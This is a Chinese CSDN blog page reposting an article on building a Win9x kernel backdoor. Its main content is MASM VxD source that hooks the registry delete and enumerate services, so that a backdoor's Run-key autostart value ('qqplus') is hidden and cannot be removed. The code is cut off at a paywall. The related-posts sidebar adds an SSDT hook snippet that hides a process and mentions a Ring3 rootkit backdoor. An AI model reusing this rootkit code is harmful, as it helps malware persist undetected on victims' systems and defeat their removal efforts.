win9x内核后门开发技术之注册表保护

最新推荐文章于 2023-10-18 11:05:23 发布
最新推荐文章于 2023-10-18 11:05:23 发布
阅读量2.9k 收藏
点赞数
分类专栏: 技术文档 文章标签: hook class service null api include
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/sunwear/article/details/392684
版权
本文介绍了在Win9x环境下开发内核级后门,通过注册表保护技术实现隐藏关键键值和防止主键被删除。作者czy分享了驱动加载文件代码,包括钩子函数来拦截RegDELKey、RegDELvalue和RegEnumvalue操作。此外,还提供了一个名为load.exe的程序,用于安装和卸载文件系统API钩子。
摘要由CSDN通过智能技术生成

作者:czy

www.chinansl.com/czy/reg.rar

驱动加载文件代码在最后


win9x内核后门开发技术之注册表保护
                                                         czy82于03.06
;在f-king这儿第一次发出来,其实在隐藏注册表键值这儿还是有小问题
;注册表保护操作,隐藏注册表键值,保护特殊键值,主键不被删除
;开发环境98ddk,masm6.1
.386p

.XLIST

INCLUDE VMM.Inc
INCLUDE ../../inc/win98/vwin32.inc
include ../../inc/win98/vmmreg.inc
INCLUDE Shell.Inc

.LIST

;VxD声明

Declare_Virtual_Device REG,1,0,VxD_Control,Undefined_Device_ID,UNDEFINED_INIT_ORDER

VxD_LOCKED_DATA_SEG
RealRegDELKey      dd 0
RealRegDELvalue      dd 0
RealRegEnumvalue dd 0
pPrevHookEnumKey dd 0
szvalue             dd 0h
RetAddr            dd 0h
Retvalue      dd 0h
VxD_LOCKED_DATA_ENDS

VxD_PAGEABLE_DATA_SEG
    MsgTitle      db "VxD MessageBox",0
    open      db "open this key",0
    PathName      db "Software/Microsoft/Windows/CurrentVersion/Run",0
    valueName      db "qqplus",0
    openpath  db 0
    sKeyNameForEnum db "czy",0
VxD_PAGEABLE_DATA_ENDS


VxD_CODE_SEG

;系统控制过程

BeginProc VxD_Control
Control_Dispatch W32_DEVICEIOCONTROL,VxD_IOCTL
clc
ret
EndProc VxD_Control




BeginProc HookRegDELKey, service, hook_proc, RealRegDELKey, locked
        ArgVar hkey, DWORD
        ArgVar lpszSubKey, DWORD
        EnterProc                          

       VMMCall _lstrcmpi, <OFFSET32 PathName, dword ptr [lpszSubKey]>      
     cmp     eax, 0            
        jne      @@notmykey
        
        LeaveProc
     Return            
      
@@notmykey:

     LeaveProc
     jmp      [RealRegDELKey]
     Return      
EndProc HookRegDELKey

BeginProc HookRegDELvalue, service, hook_proc, RealRegDELvalue, locked
        ArgVar hkey, DWORD
        ArgVar lpszvalue, DW

最低0.47元/天 解锁文章
sunwear
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
专栏目录
[网络安全自学篇] 四十九.Procmon软件基本用法及文件进程、注册表查看
杨秀璋的专栏
02-26 1万+
这是作者的网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您们喜欢,一起进步。前文分享了Cracer教程的第一篇文章,详细讲解了安全术语、Web渗透流程和Windows基础、注册表及黑客常用DOS命令。本文将分享Procmon软件基本用法及文件进程、注册表查看,这是一款微软推荐的系统监视工具,功能非常强大可用来检测恶意软件。基础性文章,希望对您有所帮助。
服务级后门自己做——创建服务
技术联盟
10-08 2488
以往大多数的木马/后门都是通过修改系统ini文件(比如Win.ini,System.ini)或修改注册表的RUN值来实现自启动的,还有更简单的是修改Autobat.exe(老大,地球不适合你,你还是回火星吧),但随着网络用户安全意识的提高,连我家旁边卖茶叶蛋的大妈都知道如何对付这些老方法了。为了适应新时代木马后门技术的发展要求,一种利用Windows NT/2000/XP系统服务的后门产生了,
Windows内核和驱动进程保护
01-06
驱动开发环境详细配置,SSDT钩子的进程保护,详细的源代码
Windows内核
weixin_34176694的博客
06-09 130
每天我们都在使用Windows系统学习、编程、听音乐、玩游戏,Windows的操作想来是非常熟练了,但是你又对Windows究竟了解多少呢?本系列的目的,就是让你对Windows系统有个更直观、更清楚、更彻底的认识。尽管我们大多数人看不到Windows的源代码,对其内存调度算法这样的最深层次的技术内幕不能明窥,但是我们能够做到比方今知道的很多其它,了解这些之后你会发如今Windows上面开发会...
(转载)Windows 9X 启动全揭秘
无限天空
10-25 4204
(转载于 ·老瓦··yesky)自WIN 95发行以来,微软公司坚持对WIN 9X系统内核技术保密,用户难以获得WIN 9X启动过程更底层的技术资料,它始终是一个黑色的过程。掌握系统的启动过程是全面控制系统和优化系统的关键,现在根据公开的技术资料和实践经验,仅从应用角度,对WIN 9X(包括95、96(95OSR1)、97(95 OSR2.X)、98、98SE)的启动过程全面揭密,并对各技术细节加
多文档结构中,CImage类读入图像,与保存图像方法
shiyunqiang的专栏
08-21 1521
//读入外部图像:void CCMDITestApp::OnFileOpen(){ // TODO: 在此添加命令处理程序代码 CString ImageStyle=_T("Bitmap(*.bmp)|*.bmp|Txt(*.txt)|*.txt|All Files(*.*)|*.*||"); CFileDialog dlg(TRUE,NULL,NULL,NULL,ImageStyle,NULL); dlg.m_ofn.Flags |=OFN_ALLOWMULTISELECT|OFN_EXPLORER;//
开发知识点-C++入门到入土知识手册
最新发布
aming小老弟
10-18 758
指针经典笔试题练习题讲解typedef笔试题多个源文件-理论多个源文件-实践PBC++简述C++标准C++的应用场景第一个C++程序const修饰普通变量const修饰成员变量const修饰成员函数const修饰对象const修饰引用onst修饰函数返回值为普通变量和对象const修饰函数返回值为const的指针const修饰函数返回值为const的引用extern c的使用_cplusplus的使用string对象的构造方法string对象的赋值。
HellKitty-In-VC:Ring3 Rootkit后门
05-20
【HellKitty-In-VC: Ring3 Rootkit后门】是一种针对Windows操作系统的恶意软件,主要针对Win7 32位版本和XP系统。Rootkit是一种高级的恶意软件技术,其设计目的是隐藏在受感染系统中的存在,使攻击者能够秘密控制...
驱动程序保护进程(修改SSDT方式)源码
07-10
typedef NTSTATUS (*ZWOPENPROCESS)( OUT PHANDLE ProcessHandle, IN ACCESS_MASK DesiredAccess, IN POBJECT_ATTRIBUTES ObjectAttributes, IN PCLIENT_ID ClientId ); NTSYSAPI NTSTATUS NTAPI ZwOpenProcess ( OUT PHANDLE ProcessHandle, IN ACCESS_MASK DesiredAccess, IN POBJECT_ATTRIBUTES ObjectAttributes, IN PCLIENT_ID ClientId ); ZWOPENPROCESS OldZwOpenProcess; NTSTATUS NewZwOpenProcess ( OUT PHANDLE ProcessHandle, IN ACCESS_MASK DesiredAccess, IN POBJECT_ATTRIBUTES ObjectAttributes, IN PCLIENT_ID ClientId ) { NTSTATUS ntStatus; ntStatus = ((ZWOPENPROCESS)(OldZwOpenProcess)) ( ProcessHandle, DesiredAccess, ObjectAttributes, ClientId ); if(ClientId->UniqueProcess == (HANDLE)ulPID) *ProcessHandle = NULL; return ntStatus; }
注册表回调与注册表保护
qq_41490873的博客
01-30 823
#include <ntifs.h> #include<ntddk.h> #include <stdio.h> WCHAR KeyPath[1024] = { 0 }; WCHAR KeyName[128] = { 0 }; NTSTATUS RegisterCallBack( _In_ PVOID CallbackContext, _In_opt_ PVOID Argument1, _In_opt_ PVOID Argument2 ) { NTSTATUS stat
Win64 驱动内核编程-15.回调监控注册表
天使也掉毛
03-13 4740
回调监控注册表     在 WIN32 平台上,监控注册表的手段通常是 SSDT HOOK。不过用 SSDT HOOK 的方式监控注册表实在是太麻烦了,要 HOOK 一大堆函数,还要处理一些 NT6 系统有而 NT5 系统没有的函数。下面我就来介绍一种完胜 SSDT HOOK 监控注册表的方法,效果跟 SSDT HOOK 一样好。这个方法就是使用微软推荐的注册表监控函数:CmRegisterC
Windows内核-注册表操作(一)
World-wang
06-20 1066
/////////////////////////////////////////////////////////////////////////////// /// /// Copyright (c) 2014 - /// /// Original filename: RegOper.cpp /// Project : RegOper /// Date of creation
利用CmRegisterCallback函数在Windows下保护注册表
diveintokernel的专栏
03-31 4340
<br />一般在Windows下保护注册表有以下几种方法:<br /> <br />1. Ring3 hook <br /> 实现简单。可利用微软的Detour库,第三方的mhook库,或者自己实现。<br /> 但是如果是做产品的话不得不考虑兼容性的问题,纵使周知,大量的病毒、木马和恶意程序使用同样的方法来隐藏或者保护自身<br /> 的注册表项和键值,基本上所有基于行为监控的安全类软件都会向用户报告此类程序为恶意程序。<br />2. Ring0 hook<br /> 原理和Ring3 hook基本上
GetVersion 获取系统版本号
happyforever_Wang的专栏
06-08 6096
概述:DWORD WINAPI GetVersion(void);返回当前操作系统的版本,如果调用成功,返回值的低位字中包含操作系统的主版本与次版本,高位字节包含有操作系统build号。对于所有平台,低位字包含操作系统的版本号, 低位字的低字节是系统的主版本号,用十六进制表示;低位字的高字节表示系统的次版本号,用十六进制表示,高位字表示系统的bulid号。 示例: #include
麦洛克菲内核开发课程试讲:从入门到高级技术
2. 内核开发基础篇:深入讨论驱动级文件和注册表操作,中断运行级别,同步与多线程机制,以及内核数据结构的使用,同时教授如何实现应用程序与驱动之间的通信及弹窗功能。 3. 内核高级技术:涵盖了HOOK技术,文件...
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值